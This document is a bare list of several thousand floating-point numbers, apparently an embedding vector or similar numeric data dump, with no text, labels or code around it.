0.017282897606492043, -0.06239877641201019, -0.010813082568347454, -0.0835590586066246, -0.029861843213438988, 0.0018316115019842982, 0.01454769168049097, -0.035647857934236526, -0.015584665350615978, 0.030147386714816093, 0.0067253015004098415, -0.025353260338306427, 0.003193578915670514, -0.00474528269842267, -0.006552472710609436, 0.01253385841846466, -0.00829579122364521, 0.06744839251041412, 0.019747590646147728, 0.022512853145599365, -0.02840406820178032, 0.002795320935547352, 0.0039788237772881985, -0.01877073012292385, -0.026360176503658295, -0.02273828350007534, 0.015389293432235718, -0.008926992304623127, -0.027171721681952477, -0.010993425734341145, 0.01992793381214142, -0.006221843417733908, 0.014021690934896469, -0.01880078762769699, 0.014908378012478352, 0.034806255251169205, 0.004613782279193401, 0.02613474801182747, -0.023760227486491203, 0.008633934892714024, 0.03706054389476776, -0.009648365899920464, -0.011895142495632172, -0.006537443958222866, 0.018966102972626686, -0.005143540911376476, -0.00993390940129757, 0.010181881487369537, -0.004512339364737272, 0.0005471352487802505, -0.02476714551448822, 0.06582529842853546, -0.01774878427386284, 0.009550679475069046, 0.005951328668743372, -0.006559987086802721, -0.019161473959684372, 0.02706652134656906, 0.03709060326218605, -0.02807343751192093, -0.014713006094098091, -0.007225003093481064, 0.012233286164700985, 0.03222133219242096, -0.03549756854772568, 0.002906156936660409, 0.007589446846395731, -0.011789942160248756, -0.011091112159192562, -0.04054718092083931, 0.03811254724860191, 0.0018851509084925056, -0.03796226158738136, 0.010196910239756107, -0.054583899676799774, 0.042711302638053894, -0.011496884748339653, -0.028449153527617455, -0.004981983453035355, -0.019401932135224342, -0.006018957123160362, -0.043282389640808105, -0.010106738656759262, 0.007469217758625746, -0.024361371994018555, 0.013826319016516209, -0.02592434734106064, -0.030237557366490364, 0.014743063598871231, -0.017027411609888077, -0.0025755276437848806, 0.023324398323893547, 0.025939375162124634, 0.03742123022675514, 0.027081551030278206, 0.011895142495632172, -0.0004992315662093461, -0.012601487338542938, 0.01150439865887165, 0.005598156247287989, -0.005913756787776947, 0.03549756854772568, -0.012315943837165833, -0.0018663652008399367, 0.03423516824841499, -0.020634276792407036, -0.01433729100972414, 0.0008458287920802832, 0.05196892470121384, 0.02386542782187462, 0.02598446235060692, -0.01834992878139019, -0.03219127655029297, 0.0030620787292718887, 0.027141664177179337, -0.038924094289541245, -0.009355307556688786, -0.01538177952170372, 0.023760227486491203, 0.019026216119527817, -0.0034716082736849785, -0.0056094275787472725, -0.04445461928844452, -0.001995047554373741, 0.008701563812792301, 0.002900521270930767, -0.020874734967947006, 0.012849459424614906, -0.03363402187824249, -0.012263343669474125, -0.021460851654410362, 0.012691658921539783, 0.008243191055953503, 0.0018701222725212574, -0.012924602255225182, -0.05593647435307503, 0.022092051804065704, -0.020934849977493286, -0.029876871034502983, 0.030928874388337135, 0.01662163995206356, 0.020844677463173866, -0.043252330273389816, -0.02897515520453453, 0.010850653983652592, -0.0038736234419047832, 0.035016655921936035, -0.01605055294930935, 0.0004973529721610248, 0.002534198807552457, 0.001946204574778676, -0.03309299424290657, 0.02631509117782116, 0.01847015880048275, 0.05022560432553291, -0.015614722855389118, 0.029516184702515602, 0.029426012188196182, 0.0013807532377541065, -0.0006645462126471102, 0.015599694103002548, 0.012421144172549248, 0.014585263095796108, -0.027201779186725616, 0.013480660505592823, 0.03429528325796127, 0.007589446846395731, -0.025774061679840088, 0.016486382111907005, 0.02037879079580307, 0.03549756854772568, -0.0023407055996358395, -0.020303647965192795, 0.02607463300228119, -0.03372419625520706, -0.018695587292313576, 0.019612332805991173, -0.028960125520825386, 0.0024628129322081804, 0.031319618225097656, -0.034445568919181824, -0.018575359135866165, 0.01238357275724411, 0.002453420078381896, -0.026811035349965096, -0.039435066282749176, -0.011955256573855877, 0.009685937315225601, -0.01421706285327673, -0.027231836691498756, 0.021566051989793777, -0.030838701874017715, 0.005868670996278524, -0.005887456703931093, 0.017508327960968018, 0.046438395977020264, -0.006097857374697924, -0.00666143000125885, -0.019431989639997482, 0.003270600689575076, -0.030087271705269814, -0.03140978887677193, -0.0016775683034211397, -0.0010642132256180048, 0.04550662264227867, 0.019973019137978554, -0.0189210157841444, 0.015043635852634907, -0.007472974713891745, 0.0166516974568367, 0.017493298277258873, 0.042530957609415054, -0.00828076247125864, 0.0009975237771868706, 0.002515413099899888, 0.004099052399396896, -0.01009922381490469, 0.006503629963845015, -0.024932458996772766, -0.030988987535238266, -0.05410298705101013, -0.03354385122656822, 0.029546242207288742, 0.0017949793254956603, -0.046979427337646484, 0.022332509979605675, 0.012270857580006123, -0.002218598034232855, 0.038683634251356125, -0.023083940148353577, -0.006135428790003061, -0.0251278318464756, -0.017718728631734848, -0.008799249306321144, 0.021686280146241188, -0.021911708638072014, 0.0039713094010949135, -0.01497600693255663, 0.0034284009598195553, 0.013721118681132793, 0.0181695856153965, -0.012872002087533474, 0.00031325253075920045, -0.0636010691523552, 0.00890444964170456, -0.014818206429481506, -0.03703048825263977, -0.0015714287292212248, -0.007566903717815876, -0.015524551272392273, 0.005496712867170572, -0.0169522687792778, -0.0378420315682888, -0.039134494960308075, -0.014074290171265602, -0.021175308153033257, -0.03817266225814819, -0.04490547999739647, 0.027817951515316963, -0.028328925371170044, -0.05272035300731659, -0.0068868594244122505, 0.0457170233130455, 0.03309299424290657, -0.024722058326005936, 0.04235061630606651, 0.02043890580534935, -0.011008454486727715, 0.03309299424290657, 0.0038773806300014257, 0.010617710649967194, -0.012052942998707294, 0.01980770379304886, 0.012684144079685211, 0.0140066621825099, 0.005199898034334183, -0.00008723636710783467, 0.04198992997407913, 0.028900012373924255, 0.006868073716759682, 0.039104435592889786, -0.010302110575139523, 0.023534798994660378, 0.034655969589948654, -0.019702503457665443, 0.0076307752169668674, -0.010437367483973503, 0.030958930030465126, -0.013488175347447395, -0.014675434678792953, 0.03739117458462715, 0.024361371994018555, -0.019837761297822, 0.02395560033619404, -0.04400376230478287, -0.03264213353395462, -0.030327729880809784, 0.022422682493925095, -0.01436734851449728, -0.03025258705019951, -0.021460851654410362, -0.008453591726720333, 0.025969432666897774, -0.03222133219242096, 0.025593718513846397, 0.015629751607775688, -0.0031973361037671566, 0.03252190724015236, -0.026630692183971405, -0.034144993871450424, -0.04132866859436035, 0.015239007771015167, -0.025533603504300117, 0.011729828082025051, 0.0033908295445144176, 0.021415764465928078, 0.014419948682188988, 0.019612332805991173, 0.0006697123171761632, -0.008746649138629436, 0.00415540998801589, 0.034986596554517746, -0.008799249306321144, 0.019732560962438583, 0.011797457002103329, 0.01898113079369068, -0.02643531933426857, 0.009655879810452461, 0.016726840287446976, -0.03615882992744446, -0.024541715160012245, 0.009693451225757599, -0.04430433362722397, 0.01212808582931757, -0.009828709065914154, 0.051427893340587616, 0.043703190982341766, 0.001252070884220302, 0.03555768355727196, -0.012541372328996658, 0.005060883238911629, 0.018755702301859856, -0.04403381794691086, -0.02795320935547352, -0.030838701874017715, -0.009272650815546513, -0.01680198311805725, -0.034475624561309814, -0.030628301203250885, -0.014089318923652172, -0.007814875803887844, -0.013999147340655327, 0.02276833914220333, 0.017793871462345123, 0.0039036807138472795, -0.034475624561309814, 0.006052771583199501, 0.015043635852634907, 0.030297672376036644, 0.015329179354012012, -0.015494493767619133, 0.017493298277258873, 0.0109032541513443, 0.004538639448583126, 0.004812911618500948, -0.015795066952705383, -0.017117584124207497, 0.04502570629119873, -0.023594914004206657, -0.013067374005913734, 0.017673641443252563, -0.0047264969907701015, -0.022603025659918785, -0.005538041703402996, -0.012751772999763489, -0.02004816196858883, -0.021551022306084633, -0.006274443585425615, -0.03183059021830559, 0.00887439213693142, -0.017102554440498352, 0.04153906926512718, 0.008603877387940884, -0.027291949838399887, -0.01127896923571825, -0.0066238585859537125, 0.009205021895468235, 0.007784818299114704, 0.009024678729474545, -0.00557937053963542, -0.00526752695441246, -0.0028911284171044827, 0.010790539905428886, -0.04220033064484596, -0.01300725992769003, -0.009971480816602707, 0.029786698520183563, 0.0157499797642231, -0.004771582782268524, -0.01992793381214142, -0.009498079307377338, -0.015494493767619133, 0.006402186583727598, -0.027502350509166718, 0.026931263506412506, -0.016606610268354416, 0.010039109736680984, -0.02715669386088848, 0.005323884077370167, 0.008288277313113213, 0.03567791357636452, -0.024571772664785385, 0.007427888922393322, -0.02398565784096718, -0.013713603839278221, -0.005970114376395941, 0.029456069692969322, 0.002836649538949132, 0.00929519347846508, -0.007435403298586607, 0.024992574006319046, -0.012067971751093864, 0.014968493022024632, -0.007288874592632055, 0.0222573671489954, 0.00912987906485796, 0.015479465015232563, -0.003041414311155677, 0.010422338731586933, 0.0067403302527964115, -0.0037064303178340197, -0.0369403176009655, -0.017643583938479424, 0.002385791391134262, 0.025368288159370422, 0.019371874630451202, 0.0034359153360128403, -0.004050209652632475, 0.013811290264129639, 0.010737939737737179, 0.005868670996278524, 0.021160278469324112, -0.01517137885093689, 0.024872343987226486, -0.01859038695693016, -0.029426012188196182, 0.007326446007937193, -0.003740244545042515, 0.029831785708665848, -0.007995218969881535, -0.013119974173605442, -0.014885835349559784, 0.00789001863449812, 0.020303647965192795, 0.012413629330694675, 0.0077622756361961365, -0.02213713899254799, 0.03624900057911873, -0.017658613622188568, -0.009610794484615326, 0.009182479232549667, 0.034475624561309814, 0.017508327960968018, 0.0008819914073683321, 0.019431989639997482, -0.004989497363567352, -0.000059879606851609424, -0.012887030839920044, 0.008859364315867424, 0.0015620358753949404, -0.017373070120811462, -0.02207702398300171, 0.03769174590706825, -0.013856375589966774, 0.0246769730001688, 0.029050298035144806, -0.04153906926512718, 0.01668175309896469, 0.03315310925245285, 0.007412860635668039, 0.02025856263935566, 0.007987705059349537, 0.03022252954542637, 0.024301256984472275, -0.046648796647787094, 0.058972254395484924, -0.016275981441140175, -0.01250380091369152, 0.021205365657806396, -0.005075911991298199, -0.0073640174232423306, 0.0021490908693522215, -0.012203228659927845, -0.030688416212797165, 0.028869954869151115, -0.00009222633525496349, -0.028990183025598526, -0.019537189975380898, 0.01535172201693058, -0.0049782260321080685, -0.005902485456317663, -0.024241143837571144, -0.03760157525539398, 0.011391684412956238, 0.007536846678704023, -0.0014728035312145948, 0.031169330701231956, -0.0077472468838095665, 0.020213477313518524, -0.007420375011861324, -0.006176757626235485, 0.01456272043287754, 0.01197780016809702, -0.017493298277258873, 0.0037045516073703766, 0.004290667362511158, 0.005684570875018835, 0.009054736234247684, -0.02443651482462883, 0.008603877387940884, 0.03213116154074669, 0.0003268721920903772, -0.002994450042024255, -0.004264367278665304, -0.02431628666818142, 0.010565110482275486, -0.0049932547844946384, -0.006668944377452135, 0.01834992878139019, 0.0028404067270457745, -0.0047264969907701015, -0.034415509551763535, 0.011316541582345963, 0.01153445616364479, -0.008656477555632591, 0.017327984794974327, -0.012849459424614906, -0.006965759210288525, -0.006082828622311354, 0.007600718177855015, 0.006526172626763582, 0.0062406291253864765, -0.022963711991906166, 0.009911366738379002, -0.0222573671489954, -0.015291607938706875, 0.006969516631215811, -0.03739117458462715, 0.00564699899405241, -0.011752370744943619, 0.012984716333448887, -0.003727094503119588, 0.00026981046539731324, 0.007668346632272005, 0.006913159508258104, -0.007292631547898054, 0.028358981013298035, -0.03049304336309433, -0.022512853145599365, 0.020604221150279045, -0.009550679475069046, 0.014810692518949509, 0.012902059592306614, -0.04192981496453285, 0.007927590049803257, 0.005507984664291143, -0.03198087587952614, 0.0006434122333303094, -0.0061241574585437775, 0.007330202963203192, -0.0006711212336085737, 0.012270857580006123, -0.002953121205791831, 0.0018654258456081152, 0.00698830233886838, 0.005665784701704979, 0.04433439299464226, 0.002802835311740637, 0.01229340024292469, -0.0005311673157848418, -0.02658560685813427, -0.021085135638713837, 0.01571992225944996, -0.01047493889927864, -0.021941766142845154, -0.039014264941215515, -0.0003836991381831467, 0.03225139155983925, 0.029020240530371666, 0.006714030168950558, -0.002727692248299718, 0.03067338652908802, -0.0018898473354056478, -0.009452993981540203, -0.006635129917412996, 0.021551022306084633, 0.011196312494575977, -0.015524551272392273, -0.00994893815368414, 0.0020852191373705864, -0.006180514581501484, 0.012263343669474125, 0.0016653575003147125, 0.0027539923321455717, 0.00564699899405241, -0.03159013390541077, -0.01831987127661705, 0.01357834693044424, -0.02694629319012165, 0.024090858176350594, 0.016245923936367035, -0.05746939405798912, 0.0062331147491931915, 0.03612877056002617, 0.030072243884205818, 0.007965161465108395, -0.019326789304614067, -0.017673641443252563, 0.0068868594244122505, 0.010655282065272331, -0.027622580528259277, 0.007300145924091339, -0.017297927290201187, 0.009828709065914154, -0.012819401919841766, -0.01399163343012333, 0.0011299634352326393, -0.001863547251559794, 0.0028347710613161325, 0.0014483820414170623, -0.022663138806819916, 0.006157971918582916, -0.005357698537409306, -0.012654087506234646, 0.022873539477586746, -0.01641123928129673, -0.023775257170200348, -0.010039109736680984, 0.0066163442097604275, -0.02933584153652191, -0.00729638896882534, -0.0023068911395967007, -0.03666980192065239, -0.029486127197742462, -0.0009618308395147324, -0.025218002498149872, 0.042380671948194504, 0.0036895230878144503, -0.014096833765506744, -0.001182563486509025, -0.01215814333409071, -0.0010125524131581187, -0.00020605629833880812, 0.02834395319223404, -0.03010229952633381, 0.02446657232940197, -0.030988987535238266, -0.034205108880996704, -0.01217317208647728, -0.001208863570354879, 0.007307660300284624, -0.002201691037043929, 0.02183656580746174, -0.012676630169153214, 0.007285117171704769, -0.02198685146868229, -0.04099804162979126, 0.007288874592632055, -0.013668518513441086, -0.008679020218551159, 0.010640254244208336, -0.03621894493699074, 0.009220050647854805, -0.015306636691093445, 0.010640254244208336, 0.010444882325828075, 0.0012821280397474766, -0.008633934892714024, -0.00504209753125906, 0.014833235181868076, -0.006345829460769892, -0.022512853145599365, 0.05734916403889656, -0.007179917301982641, 0.001713261241093278, -0.009445480071008205, 0.010257024317979813, 0.004343267530202866, -0.02473708800971508, -0.00890444964170456, 0.017162669450044632, 0.014314748346805573, -0.01904124580323696, -0.014096833765506744, 0.0008852789178490639, -0.02682606317102909, 0.02282845415174961, -0.014780635014176369, 0.024962516501545906, 0.027577493339776993, -0.01641123928129673, -0.007078473921865225, 0.021055078133940697, -0.04556673765182495, 0.0041028098203241825, -0.0258942898362875, -0.0299820713698864, 0.017327984794974327, -0.03378430753946304, 0.005038340575993061, 0.013074887916445732, 0.020153362303972244, 0.0079501336440444, 0.02470703050494194, -0.007112288381904364, 0.007499274797737598, 0.025683889165520668, -0.016396209597587585, -0.010039109736680984, -0.01608061045408249, -0.01777884177863598, 0.020213477313518524, -0.012729230336844921, -0.00546665582805872, 0.021340621635317802, -0.013811290264129639, 0.0019368117209523916, -0.016125695779919624, -0.019762618467211723, 0.01293211616575718, -0.028238752856850624, -0.0037364873569458723, 0.003011357272043824, -0.03675997257232666, -0.04430433362722397, -0.015284093096852303, -0.0026844849344342947, -0.02022850513458252, 0.022693196311593056, 0.004020152613520622, -0.02673589251935482, -0.003727094503119588, -0.01130902674049139, 0.007153617218136787, 0.03153001889586449, -0.0050721550360322, 0.001363846124149859, 0.02933584153652191, -0.007668346632272005, 0.024150971323251724, -0.03246179223060608, -0.015178893692791462, 0.004508581943809986, -0.001252070884220302, -0.03201093152165413, -0.038863979279994965, 0.00384544488042593, 0.0012436172692105174, 0.016396209597587585, 0.005699599161744118, -0.04499565064907074, 0.01704244129359722, -0.055756133049726486, -0.009565708227455616, -0.015239007771015167, 0.014209548011422157, 0.0058799427933990955, 0.0012126207584515214, -0.022723253816366196, 0.017613528296351433, -0.001552643021568656, -0.023564856499433517, 0.027216807007789612, 0.012872002087533474, 0.020003076642751694, 0.011466827243566513, -0.007724704220890999, 0.009708479978144169, -0.013676032423973083, -0.034144993871450424, 0.03703048825263977, 0.017312955111265182, 0.042681243270635605, -0.02822372503578663, -0.01356331817805767, -0.012864488177001476, 0.0283138956874609, 0.0005753138684667647, -0.025503545999526978, -0.006672701798379421, 0.020423877984285355, 0.031049102544784546, 0.007446674630045891, -0.006296986248344183, -0.009708479978144169, -0.008288277313113213, 0.014434977434575558, 0.017373070120811462, -0.007995218969881535, -0.002102126367390156, 0.008724106475710869, -0.01318760309368372, -0.013428060337901115, 0.008243191055953503, 0.0010435489239171147, -0.022542910650372505, -0.047340113669633865, -0.031229445710778236, 0.0239255428314209, -0.005808556452393532, 0.010955854319036007, -0.015088721178472042, -0.03787209093570709, -0.023504741489887238, 0.003967552445828915, -0.03318316489458084, -0.015659809112548828, 0.0034659726079553366, 0.00698830233886838, -0.025082744657993317, 0.005504227243363857, -0.004384596366435289, 0.001322517404332757, 0.0014728035312145948, -0.0038848950061947107, -0.014089318923652172, -0.005278798285871744, -0.011699770577251911, 0.031319618225097656, -0.027998294681310654, 0.02413594350218773, -0.008573820814490318, -0.02712663635611534, 0.0017996757524088025, -0.025668861344456673, -0.0047189826145768166, 0.05287063866853714, 0.006293229293078184, 0.004038938321173191, 0.00232379836961627, -0.01596038043498993, -0.0017480148235335946, -0.010407310910522938, -0.025187944993376732, -0.05846128240227699, 0.0009284861152991652, -0.012699172832071781, -0.0031128001864999533, 0.008671506308019161, 0.005816070828586817, 0.024992574006319046, -0.02091982029378414, -0.01318760309368372, 0.03669985756278038, 0.0035880799405276775, 0.031109217554330826, -0.03660968691110611, 0.029245669022202492, -0.02864452451467514, 0.013405517674982548, 0.004294424317777157, -0.01515635009855032, 0.0034096152521669865, -0.011872599832713604, 0.01533669326454401, -0.0024365128483623266, -0.012052942998707294, -0.0037195803597569466, -0.0018391257617622614, 0.017673641443252563, 0.0004440483753569424, -0.022452739998698235, 0.000986252329312265, -0.00082046800525859, 0.0202886201441288, -0.0327022485435009, 0.013074887916445732, -0.029771670699119568, 0.02837401069700718, -0.007724704220890999, -0.016636667773127556, 0.023700114339590073, 0.03748134523630142, -0.004561182111501694, -0.019627360627055168, -0.002350098453462124, 0.008543763309717178, 0.0025736489333212376, 0.029696527868509293, -0.020243532955646515, -0.0009458629647269845, 0.015689866617321968, 0.00759320380166173, 0.00789001863449812, -0.01456272043287754, -0.010512510314583778, 0.010429853573441505, -0.008348391391336918, -0.020303647965192795, -0.004651353694498539, -0.034505683928728104, -0.025323202833533287, -0.013841346837580204, 0.04108821228146553, -0.0017818292835727334, -0.02100999280810356, -0.03192076086997986, -0.01418700534850359, 0.025548631325364113, 0.019296731799840927, 0.021205365657806396, -0.00595884257927537, 0.008137990720570087, 0.021626165136694908, -0.013871404342353344, 0.042861588299274445, -0.043162159621715546, -0.021400736644864082, -0.02628503367304802, 0.010655282065272331, -0.00952062290161848, 0.029140468686819077, -0.009558194316923618, 0.002714542206376791, -0.022903596982359886, 0.015231492929160595, -0.015389293432235718, -0.0006819230620749295, -0.008663992397487164, -0.0019706261809915304, 0.0246769730001688, -0.007022116798907518, 0.01338297501206398, 0.02506771683692932, 0.02625497616827488, -0.015855180099606514, -0.02446657232940197, 0.007142345421016216, -0.002515413099899888, 0.011541970074176788, -0.023444626480340958, 0.003941252361983061, -0.002954999916255474, 0.02506771683692932, -0.018545301631093025, 0.0012154385913163424, 0.0066088298335671425, -0.04427427798509598, 0.024661945179104805, 0.0019236616790294647, -0.016336096450686455, -0.005737170577049255, -0.017072496935725212, -0.021025020629167557, -0.0012323458213359118, 0.023850400000810623, -0.021190335974097252, -0.015208950266242027, -0.007694646716117859, 0.017282897606492043, 0.07856956124305725, 0.014968493022024632, -0.007566903717815876, -0.016306038945913315, -0.000353172275936231, -0.006710273213684559, 0.03252190724015236, 0.017628556117415428, 0.019822733476758003, -0.021746395155787468, 0.04436444863677025, 0.0013920246856287122, -0.025142859667539597, -0.013044831342995167, 0.01841004379093647, 0.017553413286805153, -0.0019105116371065378, 0.010497482493519783, -0.004001366440206766, -0.013600889593362808, -0.02918555587530136, 0.009761080145835876, 0.010174366645514965, -0.0019762618467211723, -0.011481855995953083, 0.0024383915588259697, -0.00826573371887207, 0.012654087506234646, 0.022783368825912476, 0.017974214628338814, -0.02073947712779045, 0.016456324607133865, -0.009152421727776527, 0.00557937053963542, 0.008663992397487164, -0.00009111093095270917, -0.012045429088175297, -0.0017245326889678836, 0.007799847051501274, -0.019537189975380898, 0.015629751607775688, -0.014277176931500435, 0.005883699748665094, -0.0006645462126471102, -0.00707095954567194, -0.0017245326889678836, 0.034205108880996704, 0.004794125910848379, -0.008040305227041245, -0.010970883071422577, -0.01686209812760353, -0.029546242207288742, 0.0036068656481802464, 0.03402476757764816, -0.008145504631102085, -0.010805568657815456, 0.0008942021522670984, -0.018064385280013084, -0.03279241919517517, -0.029110413044691086, 0.003219878999516368, 0.011384169571101665, 0.011203826405107975, -0.0068643162958323956, 0.0304329302161932, -0.02091982029378414, -0.008926992304623127, 0.00890444964170456, 0.004899325780570507, 0.029906928539276123, 0.013886433094739914, -0.022242339327931404, -0.0031278289388865232, -0.0002079348632832989, 0.04791120067238808, 0.03354385122656822, 0.006962002255022526, -0.0032461790833622217, -0.013210145756602287, -0.019101358950138092, 0.013345403596758842, 0.00044240462011657655, 0.012894544750452042, 0.002393305767327547, 0.0033081721048802137, 0.012270857580006123, 0.010617710649967194, 0.0008768253028392792, -0.01314251683652401, -0.007435403298586607, -0.00103509530890733, 0.014510120265185833, 0.017132611945271492, 0.029786698520183563, -0.005786013789474964, -0.027878066524863243, 0.00017059817037079483, -0.01127896923571825, -0.021370679140090942, -0.003548629814758897, -0.0063796439208090305, 0.004621296655386686, 0.011865084990859032, 0.023715142160654068, -0.013969090767204762, 0.008633934892714024, 0.010835626162588596, 0.005816070828586817, 0.01317257434129715, 0.03703048825263977, -0.011391684412956238, -0.013638461008667946, -0.004673896823078394, -0.019597303122282028, -0.01998804695904255, 0.019431989639997482, -0.021551022306084633, 0.02107010781764984, 0.03802237659692764, -0.002893006894737482, -0.019462047144770622, -0.010970883071422577, 0.00046236449270509183, 0.006007685791701078, 0.024571772664785385, 0.01153445616364479, -0.023384513333439827, 0.01299223117530346, 0.04553667828440666, 0.035257112234830856, 0.033994708210229874, 0.024932458996772766, -0.0021622409112751484, -0.019522160291671753, 0.025383317843079567, -0.013458117842674255, -0.0020194691605865955, 0.017508327960968018, 0.0002177973947254941, -0.010752968490123749, -0.01980770379304886, 0.006360858213156462, 0.01197780016809702, 0.008806764148175716, 0.0003111391270067543, -0.01147434115409851, -0.002645034808665514, 0.010174366645514965, 0.005158569198101759, 0.03579814359545708, -0.004365810193121433, -0.019206559285521507, -0.0007730340003035963, 0.008686535060405731, 0.005857399664819241, 0.007882504723966122, -0.0002942319551948458, -0.04809154197573662, -0.0012126207584515214, 0.02085970714688301, 0.021686280146241188, 0.016786953434348106, 0.030207499861717224, -0.011895142495632172, -0.009257622063159943, 0.02052907831966877, -0.00808539055287838, -0.046558625996112823, -0.030838701874017715, 0.007533089257776737, -0.03790214657783508, 0.03333345055580139, -0.0032931435853242874, -0.025443432852625847, 0.0026487919967621565, 0.02249782532453537, -0.025608746334910393, 0.0020514049101620913, 0.002750235144048929, -0.003937494941055775, 0.006702758837491274, 0.012879515998065472, -0.014029204845428467, -0.0032236361876130104, 0.01847015880048275, -0.01998804695904255, 0.017478270456194878, -0.012248314917087555, -0.03195082023739815, 0.025248060002923012, 0.00792007613927126, 0.015795066952705383, -0.021205365657806396, -0.011940228752791882, -0.02034873329102993, -0.01626095362007618, -0.006950730923563242, 0.0006927248905412853, 0.00526752695441246, 0.023940570652484894, -0.021055078133940697, 0.029786698520183563, -0.0013103067176416516, 0.017673641443252563, 0.00425309594720602, -0.0029700284358114004, 0.02598446235060692, -0.005368969868868589, -0.015825122594833374, 0.0062819579616189, -0.012706687673926353, -0.009250108152627945, -0.005474170204252005, 0.001966868992894888, 0.013067374005913734, -0.021340621635317802, -0.011429255828261375, -0.0047302539460361, -0.022452739998698235, 0.03396465256810188, -0.017117584124207497, 0.006285714916884899, 0.007536846678704023, 0.008911964483559132, -0.015554608777165413, 0.011639656499028206, 0.04625805467367172, -0.012473744340240955, 0.003462215419858694, 0.030628301203250885, -0.0006354282959364355, -0.015269065275788307, 0.022422682493925095, 0.008911964483559132, 0.005707113537937403, 0.008844335563480854, 0.012195714749395847, 0.003899923525750637, 0.025413375347852707, -0.03231150656938553, -0.00025759972049854696, -0.017162669450044632, -0.00832584872841835, -0.010798053815960884, -0.005293827038258314, -0.00016167493595276028, 0.017673641443252563, 0.013510718010365963, 0.014540177769958973, 0.013706089928746223, -0.010767997242510319, -0.022272394970059395, -0.001832550740800798, -0.009663394652307034, 0.005444113165140152, 0.028328925371170044, 0.01412689033895731, -0.020874734967947006, 0.028629496693611145, -0.00414038123562932, 0.004835454281419516, -0.02888498269021511, -0.012849459424614906, 0.009152421727776527, -0.02595440484583378, 0.02652549184858799, -0.021911708638072014, 0.0015648537082597613, 0.009685937315225601, -0.008724106475710869, -0.0025792845990508795, 0.005925028584897518, 0.01783895678818226, -0.0030245070811361074, -0.03808249160647392, 0.0029982072301208973, 0.014870806597173214, -0.03201093152165413, -0.038653578609228134, 0.005797285120934248, -0.005019554868340492, 0.00888942088931799, 0.012075485661625862, -0.02207702398300171, -0.003764666151255369, 0.0062631722539663315, -0.006672701798379421, -0.019236616790294647, 0.01810947246849537, -0.01132405549287796, 0.015945352613925934, 0.00909982156008482, -0.014682949520647526, 0.004700196906924248, 0.018996158614754677, 0.007285117171704769, -0.02449662983417511, 0.04018649458885193, 0.014675434678792953, -0.016366153955459595, 0.01980770379304886, 0.010767997242510319, 0.0035129368770867586, 0.0027370851021260023, -0.002220476744696498, 0.02470703050494194, 0.031259503215551376, -0.01393151842057705, -0.011744856834411621, -0.020423877984285355, 0.012052942998707294, -0.01229340024292469, 0.0002283643843838945, -0.021776452660560608, 0.010317138396203518, 0.0014972250210121274, -0.012413629330694675, 0.015434379689395428, 0.01191768515855074, -0.011541970074176788, -0.010647768154740334, -0.0035073012113571167, -0.008513705804944038, -0.02055913396179676, -0.023459656164050102, 0.00793510489165783, -0.018154557794332504, 0.005083426367491484, 0.007506789173930883, -0.0017583470325917006, 0.02246776781976223, 0.03369413688778877, -0.008378448896110058, 0.014713006094098091, -0.01668175309896469, -0.01194774266332388, -0.0010773632675409317, 0.02043890580534935, 0.0007077534683048725, -0.03757151961326599, -0.010775511153042316, 0.024902401491999626, 0.0024966273922473192, -0.022152166813611984, 0.01351823192089796, 0.0036275300662964582, 0.02183656580746174, 0.026811035349965096, -0.002075826283544302, -0.01850021630525589, -0.011654685251414776, 0.0004306635237298906, -0.016967296600341797, -0.028178637847304344, -0.002534198807552457, 0.006462301127612591, -0.007559389341622591, 0.0014991036150604486, -0.0020739478059113026, -0.014209548011422157, -0.02667577750980854, -0.0016240288969129324, -0.008814278058707714, -0.010287081822752953, -0.00030033732764422894, -0.0019029973773285747, -0.00953565165400505, 0.00415540998801589, -0.017102554440498352, 0.0039863381534814835, -0.001208863570354879, 0.02712663635611534, 0.013405517674982548, 0.031049102544784546, 0.006706515792757273, 0.0058724284172058105, 0.02482725866138935, -0.009054736234247684, -0.014111862517893314, 0.028328925371170044, 0.007972676306962967, -0.008220648393034935, -0.0035955943167209625, 0.01315754558891058, -0.027487322688102722, 0.01300725992769003, -0.0005245922948233783, -0.017718728631734848, -0.01850021630525589, -0.004395867697894573, 0.014983521774411201, 0.021055078133940697, -0.0021133979316800833, 0.02864452451467514, -0.005383998621255159, 0.005331398453563452, 0.010692854411900043, 0.01581009477376938, 0.0007720947032794356, 0.017688671126961708, 0.0044935536570847034, 0.014247119426727295, -0.0017874649493023753, 0.005966356955468655, 0.014840750023722649, 0.002714542206376791, 0.007980190217494965, -0.02004816196858883, 0.02443651482462883, 0.012233286164700985, 0.001319699571467936, 0.014780635014176369, 0.026961321011185646, -0.014637863263487816, 0.0222573671489954, -0.0339045375585556, -0.0029719071462750435, -0.04211015626788139, 0.0023820342030376196, -0.00036397407529875636, 0.0034321581479161978, 0.026780977845191956, -0.016005465760827065, 0.0004818547167815268, -0.004268124233931303, 0.000020180013962090015, -0.003424643771722913, -0.02673589251935482, -0.0003653830208349973, 0.03745128959417343, -0.007551874965429306, 0.018214672803878784, -0.012413629330694675, 0.027998294681310654, -0.009595765732228756, 0.012225772254168987, -0.014570234343409538, 0.015344208106398582, 0.016546497121453285, 0.0049857404083013535, 0.01253385841846466, -0.01299223117530346, -0.014247119426727295, -0.0016879003960639238, 0.00556434178724885, -0.005827342625707388, 0.01692221127450466, -0.0072400313802063465, 0.012015371583402157, 0.0019781403243541718, 0.02034873329102993, 0.009415422566235065, 0.003713944461196661, 0.005504227243363857, 0.007987705059349537, 0.022422682493925095, -0.004440953489392996, -0.008844335563480854, 0.0039713094010949135, -0.00017588166519999504, 0.03231150656938553, -0.006451029796153307, -0.0034227652940899134, -0.0012877638218924403, 0.000476218992844224, 0.004365810193121433, -0.006150457542389631, -0.022993769496679306, 0.002417727140709758, -0.021656222641468048, 0.024331314489245415, -0.010752968490123749, -0.0073715317994356155, 0.0038961663376539946, 0.014630349352955818, 0.014983521774411201, -0.010076681151986122, -0.014915892854332924, -0.003467851085588336, 0.00505712628364563, 0.0034509438555687666, -0.006007685791701078, -0.011301512829959393, -0.008626420982182026, 0.005068397615104914, 0.038683634251356125, 0.017057469114661217, 0.005545556079596281, -0.016456324607133865, -0.005312612745910883, -0.012150628492236137, -0.00023024296388030052, -0.005192383658140898, 0.017327984794974327, 0.0013629067689180374, -0.007465460803359747, -0.002646913519129157, 0.026480406522750854, -0.00757817504927516, 0.013330374844372272, 0.0057484423741698265, 0.021671252325177193, 0.008739135228097439, -0.009685937315225601, 0.0333033949136734, 0.0016183931147679687, 0.00016660620167385787, -0.01635112427175045, 0.02110016532242298, -0.0008087269379757345, 0.013210145756602287, 0.018845872953534126, 0.013277774676680565, 0.013653489761054516, 0.008025276474654675, -0.008896935731172562, -0.020694391801953316, 0.004891811870038509, -0.02828383818268776, 